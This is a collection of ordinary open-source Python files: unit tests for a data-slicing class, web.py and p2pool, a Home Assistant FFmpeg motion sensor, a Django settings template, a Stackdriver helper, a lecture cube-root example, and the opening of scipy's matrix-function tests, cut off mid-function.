# Copyright 2020 Google LLC # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================= """A Test module for LevelSlice Class.""" # pylint: disable=W0212 import os from math import ceil from tempfile import NamedTemporaryFile import pytest from downsample import strategy_reducer from level_slice import LevelSlice from utils import convert_to_csv class TestLevelClass: """Test Class for Testing LevelSlice""" @pytest.fixture def test_records1(self): return [ [1573149236256988, 100, 'PPX_ASYS'], [1573149236257088, 100, 'PPX_ASYS'], [1573149236257188, 300, 'PPX_ASYS'], [1573149236257288, 100, 'PPX_ASYS'], [1573149236257388, 100, 'PPX_ASYS'], [1573149236257488, 100, 'PPX_ASYS'], [1573149236257588, 100, 'PPX_ASYS'], [1573149236257688, 100, 'PPX_ASYS'], [1573149236257788, 5, 'PPX_ASYS'], [1573149236257888, 100, 'PPX_ASYS'] ] @pytest.fixture def test_records2(self): return [ [1573149236257988, 100, 'SYS'], [1573149236258888, 100, 'SYS'], [1573149236259888, 100, 'SYS'], [1573149236260888, 100, 'SYS'], [1573149236261888, 100, 'SYS'], [1573149236262888, 100, 'SYS'], [1573149236263888, 100, 'SYS'], [1573149236264888, 100, 'SYS'], [1573149236265888, 100, 'SYS'], [1573149236266888, 100, 'SYS'], [1573149236267888, 100, 'SYS'], [1573149236268888, 100, 'SYS'], [1573149236269888, 100, 'SYS'], ] def write_to_tmpfile(self, records): """Writes records to tmp file. Args: records: A list of records. Returns: An IO object. 
""" tmpfile = NamedTemporaryFile() with open(tmpfile.name, 'w') as filewriter: data_csv = convert_to_csv(records) filewriter.write(data_csv) assert os.path.exists(tmpfile.name) return tmpfile def test_read(self, test_records1): """Tests if read records same as saved ones.""" tmpfile = self.write_to_tmpfile(test_records1) test_slice = LevelSlice(tmpfile.name) test_slice.read() assert test_slice._records['PPX_ASYS'] == test_records1 tmpfile.close() def test_empty_read(self): """Tests read behavior when none filename is supplied.""" tmpfile = self.write_to_tmpfile([]) test_slice = LevelSlice(tmpfile.name) assert test_slice._records == {} test_slice.read() assert test_slice._records == {} def test_add_records_single_channel(self, test_records1): """Tests if right records added on calling add_records, add single channel.""" formatted_test_records = {test_records1[0][2]: test_records1} test_slice = LevelSlice('dummy') assert test_slice._records == {} expected_test_records = formatted_test_records test_slice.add_records(formatted_test_records) assert test_slice._records == expected_test_records expected_test_records = { test_records1[0][2]: test_records1+test_records1} test_slice.add_records(formatted_test_records) assert test_slice._records == expected_test_records def test_add_records_multi_channel(self, test_records1, test_records2): """Tests if right records added on calling add_records, add multiple channels.""" formatted_test_records = { test_records1[0][2]: test_records1, test_records2[0][2]: test_records2, } test_slice = LevelSlice('dummy') assert test_slice._records == {} expected_test_records = formatted_test_records test_slice.add_records(formatted_test_records) assert test_slice._records == expected_test_records def test_get_start(self, test_records1): """Tests start time is earliest in all records.""" tmpfile = self.write_to_tmpfile(test_records1) test_slice = LevelSlice(tmpfile.name) assert test_slice._start == -1 test_slice.read() assert test_slice.get_first_timestamp() == test_records1[0][0] tmpfile.close() def test_save_member(self, test_records1): """Tests if object member records saved.""" tmpfile = NamedTemporaryFile() test_save_slice = LevelSlice(tmpfile.name) formatted_test_records = {test_records1[0][2]: test_records1} test_save_slice.add_records(formatted_test_records) test_save_slice.save() test_read_slice = LevelSlice(tmpfile.name) test_read_slice.read() assert test_read_slice._records == formatted_test_records tmpfile.close() def test_save_parameter(self, test_records1): """Tests if parameter records saved.""" tmpfile = NamedTemporaryFile() test_save_slice = LevelSlice(tmpfile.name) formatted_test_records = {test_records1[0][2]: test_records1} test_save_slice.save(test_records1) test_read_slice = LevelSlice(tmpfile.name) test_read_slice.read() assert test_read_slice._records == formatted_test_records tmpfile.close() @pytest.mark.parametrize('strategy', ['max', 'min', 'avg']) @pytest.mark.parametrize('factor', [1, 2, 4, 6, 8, 10, 100]) def test_downsample_factor(self, test_records1, strategy, factor): """Tests if right downsample strategy is applied, using downsample factor.""" tmpfile = self.write_to_tmpfile(test_records1) test_slice = LevelSlice(tmpfile.name) test_slice.read() downsampled = test_slice.downsample(strategy, factor) assert downsampled['PPX_ASYS'] == strategy_reducer( test_records1, strategy, factor) tmpfile.close() @pytest.mark.parametrize('strategy', ['max', 'min', 'avg']) @pytest.mark.parametrize('max_records', [1, 2, 3, 4, 6, 8, 10, 100]) def 
test_downsample_max_records(self, test_records1, strategy, max_records): """Tests if right downsample strategy is applied, using max records.""" tmpfile = self.write_to_tmpfile(test_records1) test_slice = LevelSlice(tmpfile.name) test_slice.read() downsampled = test_slice.downsample(strategy, max_records=max_records) downsample_factor = ceil(len(test_records1)/max_records) assert downsampled['PPX_ASYS'] == strategy_reducer( test_records1, strategy, downsample_factor) tmpfile.close()
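strategy_reducer itself is not included in this record, so the helper below is only a plausible reading of its contract as exercised by the tests ([timestamp, value, channel] rows grouped into buckets of `factor`, with max/min/avg applied to the value column); it is a hypothetical stand-in, not the project's implementation, and which timestamp and channel survive a bucket is a guess made purely for illustration.

# Hypothetical stand-in for the downsampling contract the tests exercise;
# NOT the project's strategy_reducer.
def bucket_reducer(records, strategy, factor):
    if factor <= 1:
        return list(records)
    reduced = []
    for start in range(0, len(records), factor):
        bucket = records[start:start + factor]
        values = [row[1] for row in bucket]
        if strategy == 'max':
            value = max(values)
        elif strategy == 'min':
            value = min(values)
        elif strategy == 'avg':
            value = sum(values) / len(values)
        else:
            raise ValueError('unknown strategy: %s' % strategy)
        # Keep the first timestamp and channel of the bucket (an assumption).
        reduced.append([bucket[0][0], value, bucket[0][2]])
    return reduced


sample = [[1573149236256988 + 100 * i, 10 * i, 'PPX_ASYS'] for i in range(10)]
assert bucket_reducer(sample, 'max', 5) == [
    [sample[0][0], 40, 'PPX_ASYS'],
    [sample[5][0], 90, 'PPX_ASYS'],
]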
happyleavesaoc/home-assistant
refs/heads/dev
homeassistant/components/binary_sensor/ffmpeg_motion.py
10
""" Provides a binary sensor which is a collection of ffmpeg tools. For more details about this platform, please refer to the documentation at https://home-assistant.io/components/binary_sensor.ffmpeg_motion/ """ import asyncio import logging import voluptuous as vol from homeassistant.core import callback import homeassistant.helpers.config_validation as cv from homeassistant.components.binary_sensor import ( BinarySensorDevice, PLATFORM_SCHEMA) from homeassistant.components.ffmpeg import ( FFmpegBase, DATA_FFMPEG, CONF_INPUT, CONF_EXTRA_ARGUMENTS, CONF_INITIAL_STATE) from homeassistant.const import CONF_NAME DEPENDENCIES = ['ffmpeg'] _LOGGER = logging.getLogger(__name__) CONF_RESET = 'reset' CONF_CHANGES = 'changes' CONF_REPEAT = 'repeat' CONF_REPEAT_TIME = 'repeat_time' DEFAULT_NAME = 'FFmpeg Motion' DEFAULT_INIT_STATE = True PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({ vol.Required(CONF_INPUT): cv.string, vol.Optional(CONF_INITIAL_STATE, default=DEFAULT_INIT_STATE): cv.boolean, vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string, vol.Optional(CONF_EXTRA_ARGUMENTS): cv.string, vol.Optional(CONF_RESET, default=10): vol.All(vol.Coerce(int), vol.Range(min=1)), vol.Optional(CONF_CHANGES, default=10): vol.All(vol.Coerce(float), vol.Range(min=0, max=99)), vol.Inclusive(CONF_REPEAT, 'repeat'): vol.All(vol.Coerce(int), vol.Range(min=1)), vol.Inclusive(CONF_REPEAT_TIME, 'repeat'): vol.All(vol.Coerce(int), vol.Range(min=1)), }) @asyncio.coroutine def async_setup_platform(hass, config, async_add_devices, discovery_info=None): """Set up the FFmpeg binary moition sensor.""" manager = hass.data[DATA_FFMPEG] if not manager.async_run_test(config.get(CONF_INPUT)): return entity = FFmpegMotion(hass, manager, config) async_add_devices([entity]) class FFmpegBinarySensor(FFmpegBase, BinarySensorDevice): """A binary sensor which use FFmpeg for noise detection.""" def __init__(self, config): """Init for the binary sensor noise detection.""" super().__init__(config.get(CONF_INITIAL_STATE)) self._state = False self._config = config self._name = config.get(CONF_NAME) @callback def _async_callback(self, state): """HA-FFmpeg callback for noise detection.""" self._state = state self.hass.async_add_job(self.async_update_ha_state()) @property def is_on(self): """Return true if the binary sensor is on.""" return self._state @property def name(self): """Return the name of the entity.""" return self._name class FFmpegMotion(FFmpegBinarySensor): """A binary sensor which use FFmpeg for noise detection.""" def __init__(self, hass, manager, config): """Initialize FFmpeg motion binary sensor.""" from haffmpeg import SensorMotion super().__init__(config) self.ffmpeg = SensorMotion( manager.binary, hass.loop, self._async_callback) @asyncio.coroutine def _async_start_ffmpeg(self, entity_ids): """Start a FFmpeg instance. This method is a coroutine. """ if entity_ids is not None and self.entity_id not in entity_ids: return # init config self.ffmpeg.set_options( time_reset=self._config.get(CONF_RESET), time_repeat=self._config.get(CONF_REPEAT_TIME, 0), repeat=self._config.get(CONF_REPEAT, 0), changes=self._config.get(CONF_CHANGES), ) # run yield from self.ffmpeg.open_sensor( input_source=self._config.get(CONF_INPUT), extra_cmd=self._config.get(CONF_EXTRA_ARGUMENTS), ) @property def device_class(self): """Return the class of this sensor, from DEVICE_CLASSES.""" return 'motion'
flashycud/timestack
refs/heads/master
django/conf/project_template/settings.py
5
# Django settings for {{ project_name }} project. DEBUG = True TEMPLATE_DEBUG = DEBUG ADMINS = ( # ('Your Name', 'your_email@example.com'), ) MANAGERS = ADMINS DATABASES = { 'default': { 'ENGINE': 'django.db.backends.', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'. 'NAME': '', # Or path to database file if using sqlite3. 'USER': '', # Not used with sqlite3. 'PASSWORD': '', # Not used with sqlite3. 'HOST': '', # Set to empty string for localhost. Not used with sqlite3. 'PORT': '', # Set to empty string for default. Not used with sqlite3. } } # Local time zone for this installation. Choices can be found here: # http://en.wikipedia.org/wiki/List_of_tz_zones_by_name # although not all choices may be available on all operating systems. # On Unix systems, a value of None will cause Django to use the same # timezone as the operating system. # If running in a Windows environment this must be set to the same as your # system time zone. TIME_ZONE = 'America/Chicago' # Language code for this installation. All choices can be found here: # http://www.i18nguy.com/unicode/language-identifiers.html LANGUAGE_CODE = 'en-us' SITE_ID = 1 # If you set this to False, Django will make some optimizations so as not # to load the internationalization machinery. USE_I18N = True # If you set this to False, Django will not format dates, numbers and # calendars according to the current locale USE_L10N = True # Absolute filesystem path to the directory that will hold user-uploaded files. # Example: "/home/media/media.lawrence.com/media/" MEDIA_ROOT = '' # URL that handles the media served from MEDIA_ROOT. Make sure to use a # trailing slash. # Examples: "http://media.lawrence.com/media/", "http://example.com/media/" MEDIA_URL = '' # Absolute path to the directory static files should be collected to. # Don't put anything in this directory yourself; store your static files # in apps' "static/" subdirectories and in STATICFILES_DIRS. # Example: "/home/media/media.lawrence.com/static/" STATIC_ROOT = '' # URL prefix for static files. # Example: "http://media.lawrence.com/static/" STATIC_URL = '/static/' # URL prefix for admin static files -- CSS, JavaScript and images. # Make sure to use a trailing slash. # Examples: "http://foo.com/static/admin/", "/static/admin/". ADMIN_MEDIA_PREFIX = '/static/admin/' # Additional locations of static files STATICFILES_DIRS = ( # Put strings here, like "/home/html/static" or "C:/www/django/static". # Always use forward slashes, even on Windows. # Don't forget to use absolute paths, not relative paths. ) # List of finder classes that know how to find static files in # various locations. STATICFILES_FINDERS = ( 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', # 'django.contrib.staticfiles.finders.DefaultStorageFinder', ) # Make this unique, and don't share it with anybody. SECRET_KEY = '' # List of callables that know how to import templates from various sources. 
TEMPLATE_LOADERS = ( 'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', # 'django.template.loaders.eggs.Loader', ) MIDDLEWARE_CLASSES = ( 'django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', ) ROOT_URLCONF = '{{ project_name }}.urls' TEMPLATE_DIRS = ( # Put strings here, like "/home/html/django_templates" or "C:/www/django/templates". # Always use forward slashes, even on Windows. # Don't forget to use absolute paths, not relative paths. ) INSTALLED_APPS = ( 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.sites', 'django.contrib.messages', 'django.contrib.staticfiles', # Uncomment the next line to enable the admin: # 'django.contrib.admin', # Uncomment the next line to enable admin documentation: # 'django.contrib.admindocs', ) # A sample logging configuration. The only tangible logging # performed by this configuration is to send an email to # the site admins on every HTTP 500 error. # See http://docs.djangoproject.com/en/dev/topics/logging for # more details on how to customize your logging configuration. LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'handlers': { 'mail_admins': { 'level': 'ERROR', 'class': 'django.utils.log.AdminEmailHandler' } }, 'loggers': { 'django.request':{ 'handlers': ['mail_admins'], 'level': 'ERROR', 'propagate': True, }, } }
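
For illustration, one way the DATABASES block above might be filled in for local development with SQLite; the path is a placeholder, and the other backends would also need USER/PASSWORD/HOST/PORT as the comments in the template note.

# Example only: a filled-in DATABASES setting for local SQLite development.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': '/tmp/{{ project_name }}.db',  # placeholder path
        'USER': '',      # not used with sqlite3
        'PASSWORD': '',  # not used with sqlite3
        'HOST': '',      # not used with sqlite3
        'PORT': '',      # not used with sqlite3
    }
}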
MjAbuz/watchdog
refs/heads/master
vendor/webpy/test/application.py
3
import webtest import time import web import urllib data = """ import web urls = ("/", "%(classname)s") app = web.application(urls, globals(), autoreload=True) class %(classname)s: def GET(self): return "%(output)s" """ urls = ( "/iter", "do_iter", ) app = web.application(urls, globals()) class do_iter: def GET(self): yield 'hello, ' yield web.input(name='world').name POST = GET def write(filename, data): f = open(filename, 'w') f.write(data) f.close() class ApplicationTest(webtest.TestCase): def test_reloader(self): write('foo.py', data % dict(classname='a', output='a')) import foo app = foo.app self.assertEquals(app.request('/').data, 'a') # test class change time.sleep(1) write('foo.py', data % dict(classname='a', output='b')) self.assertEquals(app.request('/').data, 'b') # test urls change time.sleep(1) write('foo.py', data % dict(classname='c', output='c')) self.assertEquals(app.request('/').data, 'c') def testUppercaseMethods(self): urls = ("/", "hello") app = web.application(urls, locals()) class hello: def GET(self): return "hello" def internal(self): return "secret" response = app.request('/', method='internal') self.assertEquals(response.status, '405 Method Not Allowed') def testRedirect(self): urls = ( "/a", "redirect /hello/", "/b/(.*)", r"redirect /hello/\1", "/hello/(.*)", "hello" ) app = web.application(urls, locals()) class hello: def GET(self, name): name = name or 'world' return "hello " + name response = app.request('/a') self.assertEquals(response.status, '301 Moved Permanently') self.assertEquals(response.headers['Location'], 'http://0.0.0.0:8080/hello/') response = app.request('/a?x=2') self.assertEquals(response.status, '301 Moved Permanently') self.assertEquals(response.headers['Location'], 'http://0.0.0.0:8080/hello/?x=2') response = app.request('/b/foo?x=2') self.assertEquals(response.status, '301 Moved Permanently') self.assertEquals(response.headers['Location'], 'http://0.0.0.0:8080/hello/foo?x=2') def test_subdirs(self): urls = ( "/(.*)", "blog" ) class blog: def GET(self, path): return "blog " + path app_blog = web.application(urls, locals()) urls = ( "/blog", app_blog, "/(.*)", "index" ) class index: def GET(self, path): return "hello " + path app = web.application(urls, locals()) self.assertEquals(app.request('/blog/foo').data, 'blog foo') self.assertEquals(app.request('/foo').data, 'hello foo') def processor(handler): return web.ctx.path + ":" + handler() app.add_processor(processor) self.assertEquals(app.request('/blog/foo').data, '/blog/foo:blog foo') def test_subdomains(self): def create_app(name): urls = ("/", "index") class index: def GET(self): return name return web.application(urls, locals()) urls = ( "a.example.com", create_app('a'), "b.example.com", create_app('b'), ".*.example.com", create_app('*') ) app = web.subdomain_application(urls, locals()) def test(host, expected_result): result = app.request('/', host=host) self.assertEquals(result.data, expected_result) test('a.example.com', 'a') test('b.example.com', 'b') test('c.example.com', '*') test('d.example.com', '*') def test_redirect(self): urls = ( "/(.*)", "blog" ) class blog: def GET(self, path): if path == 'foo': raise web.seeother('/login', absolute=True) else: raise web.seeother('/bar') app_blog = web.application(urls, locals()) urls = ( "/blog", app_blog, "/(.*)", "index" ) class index: def GET(self, path): return "hello " + path app = web.application(urls, locals()) response = app.request('/blog/foo') self.assertEquals(response.headers['Location'], 'http://0.0.0.0:8080/login') response 
= app.request('/blog/foo', env={'SCRIPT_NAME': '/x'}) self.assertEquals(response.headers['Location'], 'http://0.0.0.0:8080/x/login') response = app.request('/blog/foo2') self.assertEquals(response.headers['Location'], 'http://0.0.0.0:8080/blog/bar') response = app.request('/blog/foo2', env={'SCRIPT_NAME': '/x'}) self.assertEquals(response.headers['Location'], 'http://0.0.0.0:8080/x/blog/bar') def test_processors(self): urls = ( "/(.*)", "blog" ) class blog: def GET(self, path): return 'blog ' + path state = web.storage(x=0, y=0) def f(): state.x += 1 app_blog = web.application(urls, locals()) app_blog.add_processor(web.loadhook(f)) urls = ( "/blog", app_blog, "/(.*)", "index" ) class index: def GET(self, path): return "hello " + path app = web.application(urls, locals()) def g(): state.y += 1 app.add_processor(web.loadhook(g)) app.request('/blog/foo') assert state.x == 1 and state.y == 1, repr(state) app.request('/foo') assert state.x == 1 and state.y == 2, repr(state) def testUnicodeInput(self): urls = ( "(/.*)", "foo" ) class foo: def GET(self, path): i = web.input(name='') return repr(i.name) def POST(self, path): if path == '/multipart': i = web.input(file={}) return i.file.value else: i = web.input() return repr(dict(i)) app = web.application(urls, locals()) def f(name): path = '/?' + urllib.urlencode({"name": name.encode('utf-8')}) self.assertEquals(app.request(path).data, repr(name)) f(u'\u1234') f(u'foo') response = app.request('/', method='POST', data=dict(name='foo')) self.assertEquals(response.data, "{'name': u'foo'}") data = '--boundary\r\nContent-Disposition: form-data; name="x"\r\nfoo\r\n--boundary\r\nContent-Disposition: form-data; name="file"; filename="a.txt"\r\nContent-Type: text/plain\r\n\r\na\r\n--boundary--\r\n' headers = {'Content-Type': 'multipart/form-data; boundary=boundary'} response = app.request('/multipart', method="POST", data=data, headers=headers) self.assertEquals(response.data, 'a') def testCustomNotFound(self): urls_a = ("/", "a") urls_b = ("/", "b") app_a = web.application(urls_a, locals()) app_b = web.application(urls_b, locals()) app_a.notfound = lambda: web.HTTPError("404 Not Found", {}, "not found 1") urls = ( "/a", app_a, "/b", app_b ) app = web.application(urls, locals()) def assert_notfound(path, message): response = app.request(path) self.assertEquals(response.status.split()[0], "404") self.assertEquals(response.data, message) assert_notfound("/a/foo", "not found 1") assert_notfound("/b/foo", "not found") app.notfound = lambda: web.HTTPError("404 Not Found", {}, "not found 2") assert_notfound("/a/foo", "not found 1") assert_notfound("/b/foo", "not found 2") def testIter(self): self.assertEquals(app.request('/iter').data, 'hello, world') self.assertEquals(app.request('/iter?name=web').data, 'hello, web') self.assertEquals(app.request('/iter', method='POST').data, 'hello, world') self.assertEquals(app.request('/iter', method='POST', data='name=web').data, 'hello, web') def testUnload(self): x = web.storage(a=0) urls = ( "/foo", "foo", "/bar", "bar" ) class foo: def GET(self): return "foo" class bar: def GET(self): raise web.notfound() app = web.application(urls, locals()) def unload(): x.a += 1 app.add_processor(web.unloadhook(unload)) app.request('/foo') self.assertEquals(x.a, 1) app.request('/bar') self.assertEquals(x.a, 2) if __name__ == '__main__': webtest.main()
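
A minimal, self-contained web.py application in the spirit of the tests above, showing a mounted sub-application and a request processor; the names and expected outputs are taken from the behaviour the tests exercise.

import web

# Sub-application mounted under /blog, as in test_subdirs above.
blog_urls = ("/(.*)", "blog_index")

class blog_index:
    def GET(self, path):
        return "blog " + path

app_blog = web.application(blog_urls, locals())

urls = (
    "/blog", app_blog,
    "/(.*)", "index",
)

class index:
    def GET(self, path):
        return "hello " + path

app = web.application(urls, locals())

# A processor wraps every request handler; here it prefixes the response with
# the request path, mirroring the processor used in test_subdirs.
def annotate(handler):
    return web.ctx.path + ":" + handler()

app.add_processor(annotate)

if __name__ == "__main__":
    # app.request() drives the app without a real HTTP server.
    print(app.request('/blog/foo').data)  # expected: "/blog/foo:blog foo"
    print(app.request('/bar').data)       # expected: "/bar:hello bar"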
narken/p2pool-altcoins
refs/heads/master
p2pool/test/util/test_expiring_dict.py
287
from twisted.internet import defer from twisted.trial import unittest from p2pool.util import deferral, expiring_dict class Test(unittest.TestCase): @defer.inlineCallbacks def test_expiring_dict1(self): e = expiring_dict.ExpiringDict(3, get_touches=True) e[1] = 2 yield deferral.sleep(1.5) assert 1 in e yield deferral.sleep(3) assert 1 not in e @defer.inlineCallbacks def test_expiring_dict2(self): e = expiring_dict.ExpiringDict(3, get_touches=True) e[1] = 2 yield deferral.sleep(2.25) e[1] yield deferral.sleep(2.25) assert 1 in e @defer.inlineCallbacks def test_expiring_dict3(self): e = expiring_dict.ExpiringDict(3, get_touches=False) e[1] = 2 yield deferral.sleep(2.25) e[1] yield deferral.sleep(2.25) assert 1 not in e
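
The tests above pin down the behaviour being relied on: with get_touches=True a read refreshes an entry's lifetime, with get_touches=False it does not. A rough standalone sketch of that idea (not p2pool's implementation) could look like this.

import time

class SimpleExpiringDict(object):
    """Illustrative sketch only; p2pool's ExpiringDict is richer than this."""

    def __init__(self, expiry_time, get_touches=True):
        self.expiry_time = expiry_time
        self.get_touches = get_touches
        self._data = {}  # key -> (value, last_touch_timestamp)

    def _expired(self, touched):
        return time.time() - touched > self.expiry_time

    def __setitem__(self, key, value):
        self._data[key] = (value, time.time())

    def __getitem__(self, key):
        value, touched = self._data[key]
        if self._expired(touched):
            del self._data[key]
            raise KeyError(key)
        if self.get_touches:
            # Reading the key counts as a touch and restarts its lifetime.
            self._data[key] = (value, time.time())
        return value

    def __contains__(self, key):
        try:
            value, touched = self._data[key]
        except KeyError:
            return False
        if self._expired(touched):
            del self._data[key]
            return False
        return True

e = SimpleExpiringDict(3, get_touches=True)
e[1] = 2
assert 1 in e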
yebrahim/pydatalab
refs/heads/master
datalab/stackdriver/monitoring/_resource.py
5
# Copyright 2016 Google Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except # in compliance with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software distributed under the License # is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express # or implied. See the License for the specific language governing permissions and limitations under # the License. """Provides the ResourceDescriptors in the monitoring API.""" from __future__ import absolute_import from builtins import object import fnmatch import pandas from . import _utils class ResourceDescriptors(object): """ResourceDescriptors object for retrieving the resource descriptors.""" _DISPLAY_HEADERS = ('Resource type', 'Display name', 'Labels') def __init__(self, filter_string=None, project_id=None, context=None): """Initializes the ResourceDescriptors based on the specified filters. Args: filter_string: An optional filter expression describing the resource descriptors to be returned. project_id: An optional project ID or number to override the one provided by the context. context: An optional Context object to use instead of the global default. """ self._client = _utils.make_client(project_id, context) self._filter_string = filter_string self._descriptors = None def list(self, pattern='*'): """Returns a list of resource descriptors that match the filters. Args: pattern: An optional pattern to further filter the descriptors. This can include Unix shell-style wildcards. E.g. ``"aws*"``, ``"*cluster*"``. Returns: A list of ResourceDescriptor objects that match the filters. """ if self._descriptors is None: self._descriptors = self._client.list_resource_descriptors( filter_string=self._filter_string) return [resource for resource in self._descriptors if fnmatch.fnmatch(resource.type, pattern)] def as_dataframe(self, pattern='*', max_rows=None): """Creates a pandas dataframe from the descriptors that match the filters. Args: pattern: An optional pattern to further filter the descriptors. This can include Unix shell-style wildcards. E.g. ``"aws*"``, ``"*cluster*"``. max_rows: The maximum number of descriptors to return. If None, return all. Returns: A pandas dataframe containing matching resource descriptors. """ data = [] for i, resource in enumerate(self.list(pattern)): if max_rows is not None and i >= max_rows: break labels = ', '. join([l.key for l in resource.labels]) data.append([resource.type, resource.display_name, labels]) return pandas.DataFrame(data, columns=self._DISPLAY_HEADERS)
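
A hedged usage sketch of the class above: the project ID and the 'gce*' pattern are placeholders, the call assumes valid Stackdriver credentials in the environment, and the import assumes the package re-exports ResourceDescriptors at this path (otherwise import it from the module shown above).

# Usage sketch only; 'my-project' and the pattern are placeholders.
from datalab.stackdriver.monitoring import ResourceDescriptors

descriptors = ResourceDescriptors(project_id='my-project')

# fnmatch-style filtering, as implemented in list() above.
for resource in descriptors.list(pattern='gce*'):
    print(resource.type, resource.display_name)

# Or render the first few descriptors as a dataframe.
df = descriptors.as_dataframe(pattern='*', max_rows=10)
print(df)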
devendermishrajio/MITx-Foundations-of-Computer-Science
refs/heads/master
6.00.1x.Introduction-to-Computer-Science-and-Programming-Using-Python/Lecture Code/lectureCode_lec3.3.3.py
2
# lecture 3.3, slide 3 # Find the cube root of a perfect cube x = int(raw_input('Enter an integer: ')) for ans in range(0, abs(x)+1): if ans**3 == abs(x): break if ans**3 != abs(x): print(str(x) + ' is not a perfect cube') else: if x < 0: ans = -ans print('Cube root of ' + str(x) + ' is ' + str(ans))
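
The same exhaustive-enumeration idea, wrapped in a function with a couple of worked checks so it can run without prompting for input.

# Same guess-and-check idea as above, packaged as a function.
def cube_root(x):
    """Return the integer cube root of x if x is a perfect cube, else None."""
    for ans in range(0, abs(x) + 1):
        if ans ** 3 == abs(x):
            return -ans if x < 0 else ans
    return None

# 3**3 = 27 and (-4)**3 = -64, so both are perfect cubes; 12 is not.
assert cube_root(27) == 3
assert cube_root(-64) == -4
assert cube_root(12) is None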
jeffery-do/Vizdoombot
refs/heads/master
doom/lib/python3.5/site-packages/scipy/linalg/tests/test_matfuncs.py
24
#!/usr/bin/env python # # Created by: Pearu Peterson, March 2002 # """ Test functions for linalg.matfuncs module """ from __future__ import division, print_function, absolute_import import random import warnings import functools import numpy as np from numpy import array, matrix, identity, dot, sqrt, double from numpy.testing import (TestCase, run_module_suite, assert_array_equal, assert_array_less, assert_equal, assert_array_almost_equal, assert_array_almost_equal_nulp, assert_allclose, assert_, decorators) from scipy._lib._numpy_compat import _assert_warns import scipy.linalg from scipy.linalg import (funm, signm, logm, sqrtm, fractional_matrix_power, expm, expm_frechet, expm_cond, norm) from scipy.linalg.matfuncs import expm2, expm3 from scipy.linalg import _matfuncs_inv_ssq import scipy.linalg._expm_frechet from scipy.optimize import minimize def _get_al_mohy_higham_2012_experiment_1(): """ Return the test matrix from Experiment (1) of [1]_. References ---------- .. [1] Awad H. Al-Mohy and Nicholas J. Higham (2012) "Improved Inverse Scaling and Squaring Algorithms for the Matrix Logarithm." SIAM Journal on Scientific Computing, 34 (4). C152-C169. ISSN 1095-7197 """ A = np.array([ [3.2346e-1, 3e4, 3e4, 3e4], [0, 3.0089e-1, 3e4, 3e4], [0, 0, 3.2210e-1, 3e4], [0, 0, 0, 3.0744e-1]], dtype=float) return A class TestSignM(TestCase): def test_nils(self): a = array([[29.2, -24.2, 69.5, 49.8, 7.], [-9.2, 5.2, -18., -16.8, -2.], [-10., 6., -20., -18., -2.], [-9.6, 9.6, -25.5, -15.4, -2.], [9.8, -4.8, 18., 18.2, 2.]]) cr = array([[11.94933333,-2.24533333,15.31733333,21.65333333,-2.24533333], [-3.84266667,0.49866667,-4.59066667,-7.18666667,0.49866667], [-4.08,0.56,-4.92,-7.6,0.56], [-4.03466667,1.04266667,-5.59866667,-7.02666667,1.04266667], [4.15733333,-0.50133333,4.90933333,7.81333333,-0.50133333]]) r = signm(a) assert_array_almost_equal(r,cr) def test_defective1(self): a = array([[0.0,1,0,0],[1,0,1,0],[0,0,0,1],[0,0,1,0]]) r = signm(a, disp=False) #XXX: what would be the correct result? def test_defective2(self): a = array(( [29.2,-24.2,69.5,49.8,7.0], [-9.2,5.2,-18.0,-16.8,-2.0], [-10.0,6.0,-20.0,-18.0,-2.0], [-9.6,9.6,-25.5,-15.4,-2.0], [9.8,-4.8,18.0,18.2,2.0])) r = signm(a, disp=False) #XXX: what would be the correct result? def test_defective3(self): a = array([[-2., 25., 0., 0., 0., 0., 0.], [0., -3., 10., 3., 3., 3., 0.], [0., 0., 2., 15., 3., 3., 0.], [0., 0., 0., 0., 15., 3., 0.], [0., 0., 0., 0., 3., 10., 0.], [0., 0., 0., 0., 0., -2., 25.], [0., 0., 0., 0., 0., 0., -3.]]) r = signm(a, disp=False) #XXX: what would be the correct result? class TestLogM(TestCase): def test_nils(self): a = array([[-2., 25., 0., 0., 0., 0., 0.], [0., -3., 10., 3., 3., 3., 0.], [0., 0., 2., 15., 3., 3., 0.], [0., 0., 0., 0., 15., 3., 0.], [0., 0., 0., 0., 3., 10., 0.], [0., 0., 0., 0., 0., -2., 25.], [0., 0., 0., 0., 0., 0., -3.]]) m = (identity(7)*3.1+0j)-a logm(m, disp=False) #XXX: what would be the correct result? def test_al_mohy_higham_2012_experiment_1_logm(self): # The logm completes the round trip successfully. # Note that the expm leg of the round trip is badly conditioned. A = _get_al_mohy_higham_2012_experiment_1() A_logm, info = logm(A, disp=False) A_round_trip = expm(A_logm) assert_allclose(A_round_trip, A, rtol=1e-5, atol=1e-14) def test_al_mohy_higham_2012_experiment_1_funm_log(self): # The raw funm with np.log does not complete the round trip. # Note that the expm leg of the round trip is badly conditioned. 
